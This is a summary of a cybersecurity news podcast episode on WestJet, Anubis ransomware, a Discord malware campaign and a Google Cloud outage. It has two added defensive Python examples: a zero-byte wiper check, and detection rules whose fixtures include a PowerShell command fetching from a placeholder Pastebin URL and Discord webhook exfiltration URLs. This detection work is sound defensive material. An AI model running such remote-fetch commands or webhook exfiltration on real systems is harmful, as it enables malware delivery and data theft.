Detailed Summary of "Cybersecurity Today" Podcast Episode
Podcast Information:
- Title: Cybersecurity Today
- Host/Author: Jim Love (episode hosted by David Shipley)
- Description: Updates on the latest cybersecurity threats to businesses, data breach disclosures, and strategies to secure your firm in an increasingly risky environment.
- Episode: Cybersecurity Today: WestJet Cyber Incident, Anubis Ransomware Evolution, Discord Exploits, and Google Cloud Outage
- Release Date: June 16, 2025
Introduction
In this episode of Cybersecurity Today, host David Shipley delves into several pressing cybersecurity issues impacting businesses and digital platforms. He covers the recent cyber incident at WestJet, the evolving threats posed by Anubis ransomware, malicious exploits on Discord, and a significant outage in Google Cloud services. The discussion emphasizes the increasing sophistication of cyber threats and the critical importance of robust security measures for organizations.
1. WestJet Cybersecurity Incident
Overview: David Shipley begins by reporting a cybersecurity incident involving WestJet, Canada's second-largest airline. The incident, confirmed on a Friday night, disrupted access to WestJet's mobile application and internal systems.
Company Response:
WestJet issued a public statement on social media, acknowledging the incident:
"We are aware of a cybersecurity incident involving internal systems and the WestJet app, which has restricted access for several users."
(Timestamp: 00:45)
The airline activated its internal response team and is collaborating with law enforcement and Transport Canada to investigate the breach. An update on Saturday night confirmed that flight operations remained safe and unaffected.
Impact and Analysis: While technical details remain undisclosed, the incident underscores the vulnerability of aviation firms, which rely heavily on real-time digital systems and operate under strict regulatory oversight. Shipley emphasizes the importance of timely and transparent communication in preserving public trust during such incidents.
Notable Quote:
"WestJet's disruption underscores the growing risk that cyber attacks pose to operational continuity."
(Timestamp: 05:30)
2. Evolution of Anubis Ransomware
Overview: Shipley shifts focus to the evolving landscape of ransomware threats, highlighting Anubis Ransomware as a Service (RaaS). First observed in December 2024, Anubis has expanded its operations in 2025 through an affiliate program offering substantial revenue sharing.
Technical Advancements: Research by Trend Micro reveals that Anubis has integrated a wiper module into its ransomware payload. This addition allows attackers to irreversibly delete file contents, reducing them to zero bytes while preserving directory structures. The wiper function can be activated via a command line parameter, adding a layer of pressure on victims by sabotaging recovery efforts even if a ransom is paid.
Implications: This development marks a significant shift in ransomware tactics from purely financial motives to incorporating data destruction as a punitive measure. Organizations are urged to enhance their disaster recovery plans and ensure that offline backups are both regular and secure.
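A recovery-readiness check for the wiper behaviour described above, as an added example that is not from the podcast or from Trend Micro's research: it compares a stored size manifest against the live tree and flags files that still exist but have dropped to zero bytes. The function names, the 20% alert threshold and the sample tree are assumptions made for illustration.

```python
import os
import tempfile

def snapshot(root):
    """Map each file's path (relative to root) to its size in bytes."""
    sizes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            sizes[os.path.relpath(full, root)] = os.path.getsize(full)
    return sizes

def find_truncated(baseline, current):
    """Files that held data in the baseline, still exist, and are now 0 bytes."""
    return sorted(p for p, size in baseline.items()
                  if size > 0 and current.get(p) == 0)

def assess(baseline, current, threshold=0.2):
    """Return (truncated_paths, ratio, alert); threshold is an assumed tuning value."""
    truncated = find_truncated(baseline, current)
    had_data = sum(1 for s in baseline.values() if s > 0)
    ratio = len(truncated) / had_data if had_data else 0.0
    return truncated, ratio, ratio >= threshold

def demo():
    """Build a constructed tree, empty two files in place, and run the check."""
    with tempfile.TemporaryDirectory() as root:
        for rel, data in [("docs/a.txt", b"alpha"), ("docs/b.txt", b"beta"),
                          ("db/c.bin", b"\x00" * 64), ("db/empty.lock", b""),
                          ("src/d.py", b"print(1)")]:
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        baseline = snapshot(root)
        # Test fixture: reproduce the end state (names and folders intact, contents gone).
        for rel in ("docs/a.txt", "db/c.bin"):
            open(os.path.join(root, rel), "wb").close()
        return assess(baseline, snapshot(root))

if __name__ == "__main__":
    truncated, ratio, alert = demo()
    print(truncated, round(ratio, 2), alert)
```

Files that were already empty in the baseline (lock files, placeholders) are excluded, and deleted files are not counted as truncated, so the ratio tracks only the zero-byte pattern.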
Notable Quote:
"Anubis's evolution highlights a growing trend towards irreversible punitive ransomware tactics."
(Timestamp: 12:15)
Additional Insights: Shipley details the technical mechanisms of Anubis, including its use of the Elliptic Curve Integrated Encryption Scheme (ECIES) and process interference to thwart system safeguards. The ransomware targets high-value victims, primarily initiating infections through phishing emails containing malicious links or attachments.
3. Discord Malware Exploits
Overview: The podcast then examines a sophisticated malware campaign exploiting Discord's vanity invite system. Attackers utilize expired or deleted invite codes to redirect users to malicious servers, delivering payloads like AsyncRAT (a remote access trojan) and the Skuld information stealer.
Technical Mechanism: Victims are lured to rogue servers where they are prompted to verify their accounts by executing a PowerShell command. This action initiates a multi-stage payload download:
- A PowerShell script hosted on Pastebin downloads a first-stage loader.
- The loader retrieves AsyncRAT and Skuld Stealer from Bitbucket and GitHub.
- Final payloads execute on the victim's system, providing attackers with remote access and stealing sensitive data, including cryptocurrency wallet seed phrases.
Attack Techniques: The campaign employs advanced evasion techniques, such as:
- Social Engineering: Convincing users to manually execute clipboard-loaded PowerShell commands.
- Sandbox Evasion: Implementing time-based execution delays and environment checks to bypass endpoint security tools.
- Data Exfiltration: Using Discord webhooks to blend malicious activity into normal platform traffic.
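Detection logic for two of the observable steps above (a user-launched PowerShell process that references a paste site, and a Discord webhook request from a process that is not a Discord client or browser), as an added example that is not from the podcast or the underlying research. The event schema, the allow-list and the sample events are constructed for illustration.

```python
import re
from urllib.parse import urlparse

PASTE_HOSTS = {"pastebin.com"}                      # first-stage script host named in the summary
DISCORD_HOSTS = {"discord.com", "discordapp.com"}
WEBHOOK_PATH = re.compile(r"^/api/webhooks/\d+/")   # path shape of a Discord webhook URL
# Assumed allow-list of programs expected to talk to Discord; tune per environment.
EXPECTED_DISCORD_CLIENTS = {"discord.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)

def _host(url):
    return (urlparse(url).hostname or "").lower()

def check_event(ev):
    """Return finding names for one event dict (hypothetical schema)."""
    findings = []
    image = ev.get("image", "").lower()
    if ev["type"] == "process" and image in ("powershell.exe", "pwsh.exe"):
        hosts = {_host(u) for u in URL_RE.findall(ev.get("cmdline", ""))}
        if hosts & PASTE_HOSTS:
            findings.append("powershell-fetches-paste-site")
        # explorer.exe as parent means a person started it (Run dialog, pasted command).
        if ev.get("parent", "").lower() == "explorer.exe" and hosts:
            findings.append("user-launched-powershell-with-url")
    elif ev["type"] == "network":
        u = urlparse(ev.get("url", ""))
        if ((u.hostname or "").lower() in DISCORD_HOSTS and WEBHOOK_PATH.match(u.path)
                and image not in EXPECTED_DISCORD_CLIENTS):
            findings.append("webhook-post-from-unexpected-process")
    return findings

# Constructed sample events (not taken from the campaign); IDs and tokens are placeholders.
EVENTS = [
    {"type": "process", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Invoke-WebRequest https://pastebin.com/raw/CONSTRUCTED"'},
    {"type": "process", "image": "powershell.exe", "parent": "services.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
    {"type": "network", "image": "updater.exe",
     "url": "https://discord.com/api/webhooks/123456789012345678/PLACEHOLDER"},
    {"type": "network", "image": "discord.exe",
     "url": "https://discord.com/api/webhooks/123456789012345678/PLACEHOLDER"},
    {"type": "network", "image": "chrome.exe", "url": "https://discord.com/channels/@me"},
]

def triage(events):
    """Map event index -> findings, keeping only events that raised something."""
    return {i: f for i, ev in enumerate(events) if (f := check_event(ev))}
```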
Impact and Response: The exploitation has targeted regions including the United States, Vietnam, France, Germany, Austria, the Netherlands, and the United Kingdom. Discord responded by disabling a malicious bot involved in the campaign. A secondary campaign was also identified, disguising its loader as a cheat tool for pirated games.
Notable Quote:
"This incident highlights how trust in platform features such as Discord invites can be turned against users when security design gaps are exploited."
(Timestamp: 21:40)
Recommendations: Shipley advises organizations and users to exercise caution when interacting with previously trusted links and to remain vigilant against the exploitation of features in widely used platforms.
4. Google Cloud Service Outage
Overview: In a deviation from cybersecurity incidents, Shipley discusses a significant service disruption experienced by Google Cloud on Thursday. The outage, lasting several hours, was caused by a misconfigured quota update in Google's API management infrastructure.
Technical Details: The outage commenced at approximately 10:49 AM Eastern Time and continued until 3:49 PM Eastern Time. An invalid automated quota update led API requests to return 503 errors, crippling both Google's own services and third-party platforms reliant on Google Cloud.
Impact: Services affected included Gmail, Google Calendar, Google Docs, Google Meet, Google Drive, and more. External applications like Spotify, Discord, Snapchat, Firebase, and select Cloudflare applications also suffered disruptions.
Recovery and Response: Google's incident summary attributed the failure to inadequate testing and insufficient error handling protocols. Recovery involved bypassing the malfunctioning quota check, though some regions experienced extended delays due to overloaded policy databases. Cloudflare confirmed that its Workers KV key-value store was impacted, leading to significant service interruptions despite no data loss.
Notable Quote:
"This incident is a stark reminder of the fragility of interconnected digital services. Single misconfiguration at the cloud infrastructure layer can ripple across dozens of dependent platforms."
(Timestamp: 29:50)
Implications: Shipley emphasizes the importance of robust automation and oversight in cloud infrastructures. He advocates for the regulation of major cloud providers akin to other critical infrastructures like banks and telecommunications to prevent such widespread disruptions.
Conclusion and Recommendations
In wrapping up the episode, Shipley reinforces the critical need for organizations to maintain and regularly test their disaster recovery plans. This preparedness is essential to mitigate the impact of both ransomware attacks and significant service outages like those experienced by Google Cloud.
Closing Advice:
"Whether it's to protect you from disruptive ransomware or major cloud provider outages, a good plan that's well tested is your best friend."
(Timestamp: 35:10)
He encourages listeners to stay updated, remain skeptical of suspicious activities, and continuously evaluate their security postures to safeguard against evolving cyber threats.
Final Remarks: David Shipley signs off, highlighting the value of listener engagement and previewing the return of Jim Love as the regular host in the following episode.
Stay Informed and Secure: To keep up with the latest in cybersecurity, regularly tune into "Cybersecurity Today" and ensure your organization is equipped to handle the dynamic threat landscape.
